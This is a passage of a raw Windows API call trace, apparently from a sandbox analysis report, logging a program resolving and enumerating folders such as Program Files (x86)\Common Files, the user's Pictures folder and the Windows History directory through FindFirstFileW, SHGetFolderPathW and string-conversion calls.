cAlternateFileName="PROGRA~2")) returned 0x69ff0 [0052.687] FindNextFileW (in: hFindFile=0x69ff0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0052.687] GetLastError () returned 0x12 [0052.687] FindClose (in: hFindFile=0x69ff0 | out: hFindFile=0x69ff0) returned 1 [0052.687] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x13ffa9c*="c:\\Program Files (x86)") returned 1 [0052.687] SysReAllocStringLen (in: pbstr=0x13ffdb0*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x13ffdb0*="c:\\Program Files (x86)\\") returned 1 [0052.687] SysReAllocStringLen (in: pbstr=0x13ffaa8*="program files (x86)", psz="common files", len=0xc | out: pbstr=0x13ffaa8*="common files") returned 1 [0052.687] FindFirstFileW (in: lpFileName="c:\\Program Files (x86)\\common files", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe6f6644c, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6f6644c, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0x6a4f0 [0052.687] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe6f6644c, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6f6644c, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0 [0052.687] GetLastError () returned 0x12 [0052.687] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.688] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x13ffa9c*="c:\\Program Files (x86)\\Common Files") returned 1 [0052.688] SysReAllocStringLen (in: pbstr=0x13ffdb0*="c:\\Program Files (x86)\\Common Files", psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x13ffdb0*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0052.688] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x13ffa98*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0052.688] SysReAllocStringLen (in: pbstr=0x13ffdb0*="c:\\Program Files (x86)\\Common Files\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x13ffdb0*="c:\\Program Files (x86)\\Common Files") returned 1 [0052.688] SysReAllocStringLen (in: pbstr=0x13ffdb4*=0x0, psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x13ffdb4*="c:\\Program Files (x86)\\Common Files") returned 1 [0052.688] SysReAllocStringLen (in: pbstr=0xe60070*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0xe60070*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0052.688] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Users\\FD1HVy\\Pictures") returned 0x0 [0052.689] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Pictures", cchLength=0x18 | out: lpsz="c:\\users\\fd1hvy\\pictures") returned 0x18 [0052.689] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\fd1hvy\\pictures", len=0x18 | out: pbstr=0xe60094*="c:\\users\\fd1hvy\\pictures") returned 1 [0052.689] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.689] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="users", len=0x5 | out: pbstr=0xe2267c*="users") returned 1 [0052.689] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="fd1hvy", len=0x6 | out: pbstr=0xe20790*="fd1hvy") returned 1 [0052.689] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="pictures", len=0x8 | out: pbstr=0xe20818*="pictures") returned 1 [0052.689] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usersn filess (x86)\x01", lpUsedDefaultChar=0x0) returned 5 [0052.689] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="fd1hvy", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fd1hvy filess (x86)\x01", lpUsedDefaultChar=0x0) returned 6 [0052.690] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="pictures", cchWideChar=8, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="picturesiless (x86)\x01", lpUsedDefaultChar=0x0) returned 8 [0052.690] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.690] SysReAllocStringLen (in: pbstr=0x13ffda4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffda4*="c:\\") returned 1 [0052.690] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 [0052.690] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a4f0 [0052.690] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.690] GetLastError () returned 0x12 [0052.690] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.690] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.690] SysReAllocStringLen (in: pbstr=0x13ffda4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x13ffda4*="c:\\Users\\") returned 1 [0052.690] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="fd1hvy", len=0x6 | out: pbstr=0x13ffaa8*="fd1hvy") returned 1 [0052.691] FindFirstFileW (in: lpFileName="c:\\Users\\fd1hvy", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x6a2b0 [0052.691] FindNextFileW (in: hFindFile=0x6a2b0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0 [0052.691] GetLastError () returned 0x12 [0052.691] FindClose (in: hFindFile=0x6a2b0 | out: hFindFile=0x6a2b0) returned 1 [0052.691] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\FD1HVy", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy") returned 1 [0052.691] SysReAllocStringLen (in: pbstr=0x13ffda4*="c:\\Users\\FD1HVy", psz="c:\\Users\\FD1HVy\\", len=0x10 | out: pbstr=0x13ffda4*="c:\\Users\\FD1HVy\\") returned 1 [0052.691] SysReAllocStringLen (in: pbstr=0x13ffaa8*="fd1hvy", psz="pictures", len=0x8 | out: pbstr=0x13ffaa8*="pictures") returned 1 [0052.691] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\pictures", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5611485, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5611485, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0x6a4f0 [0052.691] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5611485, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5611485, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0 [0052.691] GetLastError () returned 0x12 [0052.691] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.691] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\", psz="c:\\Users\\FD1HVy\\Pictures", len=0x18 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\Pictures") returned 1 [0052.691] SysReAllocStringLen (in: pbstr=0x13ffda4*="c:\\Users\\FD1HVy\\Pictures", psz="c:\\Users\\FD1HVy\\Pictures\\", len=0x19 | out: pbstr=0x13ffda4*="c:\\Users\\FD1HVy\\Pictures\\") returned 1 [0052.692] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\FD1HVy\\Pictures\\", len=0x19 | out: pbstr=0x13ffa98*="c:\\Users\\FD1HVy\\Pictures\\") returned 1 [0052.692] SysReAllocStringLen (in: pbstr=0x13ffda4*="c:\\Users\\FD1HVy\\Pictures\\", psz="c:\\Users\\FD1HVy\\Pictures", len=0x18 | out: pbstr=0x13ffda4*="c:\\Users\\FD1HVy\\Pictures") returned 1 [0052.692] SysReAllocStringLen (in: pbstr=0x13ffda8*=0x0, psz="c:\\Users\\FD1HVy\\Pictures", len=0x18 | out: pbstr=0x13ffda8*="c:\\Users\\FD1HVy\\Pictures") returned 1 [0052.692] SysReAllocStringLen (in: pbstr=0xe60074*=0x0, psz="c:\\Users\\FD1HVy\\Pictures\\", len=0x19 | out: pbstr=0xe60074*="c:\\Users\\FD1HVy\\Pictures\\") returned 1 [0052.692] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0052.693] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History", cchLength=0x37 | out: lpsz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\history") returned 0x37 [0052.693] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\history", len=0x37 | out: pbstr=0xe60094*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\history") returned 1 [0052.693] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.693] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="users", len=0x5 | out: pbstr=0xe20818*="users") returned 1 [0052.693] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="fd1hvy", len=0x6 | out: pbstr=0xe20790*="fd1hvy") returned 1 [0052.693] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="appdata", len=0x7 | out: pbstr=0xe2267c*="appdata") returned 1 [0052.693] SysReAllocStringLen (in: pbstr=0xe600cc*=0x0, psz="local", len=0x5 | out: pbstr=0xe600cc*="local") returned 1 [0052.694] SysReAllocStringLen (in: pbstr=0xe600d8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0xe600d8*="microsoft") returned 1 [0052.694] SysReAllocStringLen (in: pbstr=0xe60108*=0x0, psz="windows", len=0x7 | out: pbstr=0xe60108*="windows") returned 1 [0052.694] SysReAllocStringLen (in: pbstr=0xe60114*=0x0, psz="history", len=0x7 | out: pbstr=0xe60114*="history") returned 1 [0052.694] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usersresiless (x86)\x01", lpUsedDefaultChar=0x0) returned 5 [0052.694] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="fd1hvy", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fd1hvyesiless (x86)\x01", lpUsedDefaultChar=0x0) returned 6 [0052.694] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="appdata", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appdatasiless (x86)\x01", lpUsedDefaultChar=0x0) returned 7 [0052.694] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="local", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="localtasiless (x86)\x01", lpUsedDefaultChar=0x0) returned 5 [0052.695] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="microsoft", cchWideChar=9, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="microsoftless (x86)\x01", lpUsedDefaultChar=0x0) returned 9 [0052.695] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="windows", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windowsftless (x86)\x01", lpUsedDefaultChar=0x0) returned 7 [0052.695] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="history", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="historyftless (x86)\x01", lpUsedDefaultChar=0x0) returned 7 [0052.695] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.695] SysReAllocStringLen (in: pbstr=0x13ffd98*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffd98*="c:\\") returned 1 [0052.695] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 [0052.695] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a330 [0052.696] FindNextFileW (in: hFindFile=0x6a330, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.696] GetLastError () returned 0x12 [0052.696] FindClose (in: hFindFile=0x6a330 | out: hFindFile=0x6a330) returned 1 [0052.696] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.696] SysReAllocStringLen (in: pbstr=0x13ffd98*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x13ffd98*="c:\\Users\\") returned 1 [0052.696] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="fd1hvy", len=0x6 | out: pbstr=0x13ffaa8*="fd1hvy") returned 1 [0052.696] FindFirstFileW (in: lpFileName="c:\\Users\\fd1hvy", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x69e70 [0052.696] FindNextFileW (in: hFindFile=0x69e70, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0 [0052.696] GetLastError () returned 0x12 [0052.696] FindClose (in: hFindFile=0x69e70 | out: hFindFile=0x69e70) returned 1 [0052.697] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\FD1HVy", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy") returned 1 [0052.697] SysReAllocStringLen (in: pbstr=0x13ffd98*="c:\\Users\\FD1HVy", psz="c:\\Users\\FD1HVy\\", len=0x10 | out: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\") returned 1 [0052.697] SysReAllocStringLen (in: pbstr=0x13ffaa8*="fd1hvy", psz="appdata", len=0x7 | out: pbstr=0x13ffaa8*="appdata") returned 1 [0052.697] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\appdata", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x6a2b0 [0052.697] FindNextFileW (in: hFindFile=0x6a2b0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0052.697] GetLastError () returned 0x12 [0052.697] FindClose (in: hFindFile=0x6a2b0 | out: hFindFile=0x6a2b0) returned 1 [0052.697] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\", psz="c:\\Users\\FD1HVy\\AppData", len=0x17 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData") returned 1 [0052.698] SysReAllocStringLen (in: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData", psz="c:\\Users\\FD1HVy\\AppData\\", len=0x18 | out: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\") returned 1 [0052.698] SysReAllocStringLen (in: pbstr=0x13ffaa8*="appdata", psz="local", len=0x5 | out: pbstr=0x13ffaa8*="local") returned 1 [0052.698] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\local", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x69e70 [0052.698] FindNextFileW (in: hFindFile=0x69e70, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0052.698] GetLastError () returned 0x12 [0052.698] FindClose (in: hFindFile=0x69e70 | out: hFindFile=0x69e70) returned 1 [0052.698] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\", psz="c:\\Users\\FD1HVy\\AppData\\Local", len=0x1d | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local") returned 1 [0052.698] SysReAllocStringLen (in: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local", psz="c:\\Users\\FD1HVy\\AppData\\Local\\", len=0x1e | out: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local\\") returned 1 [0052.698] SysReAllocStringLen (in: pbstr=0x13ffaa8*="local", psz="microsoft", len=0x9 | out: pbstr=0x13ffaa8*="microsoft") returned 1 [0052.698] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\microsoft", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x6a130 [0052.699] FindNextFileW (in: hFindFile=0x6a130, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0052.699] GetLastError () returned 0x12 [0052.699] FindClose (in: hFindFile=0x6a130 | out: hFindFile=0x6a130) returned 1 [0052.699] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", len=0x27 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft") returned 1 [0052.699] SysReAllocStringLen (in: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\", len=0x28 | out: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\") returned 1 [0052.699] SysReAllocStringLen (in: pbstr=0x13ffaa8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x13ffaa8*="windows") returned 1 [0052.699] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\windows", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9fa64c01, ftLastAccessTime.dwHighDateTime=0x1d336de, ftLastWriteTime.dwLowDateTime=0x9fa64c01, ftLastWriteTime.dwHighDateTime=0x1d336de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x6a0f0 [0052.699] FindNextFileW (in: hFindFile=0x6a0f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9fa64c01, ftLastAccessTime.dwHighDateTime=0x1d336de, ftLastWriteTime.dwLowDateTime=0x9fa64c01, ftLastWriteTime.dwHighDateTime=0x1d336de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0052.699] GetLastError () returned 0x12 [0052.699] FindClose (in: hFindFile=0x6a0f0 | out: 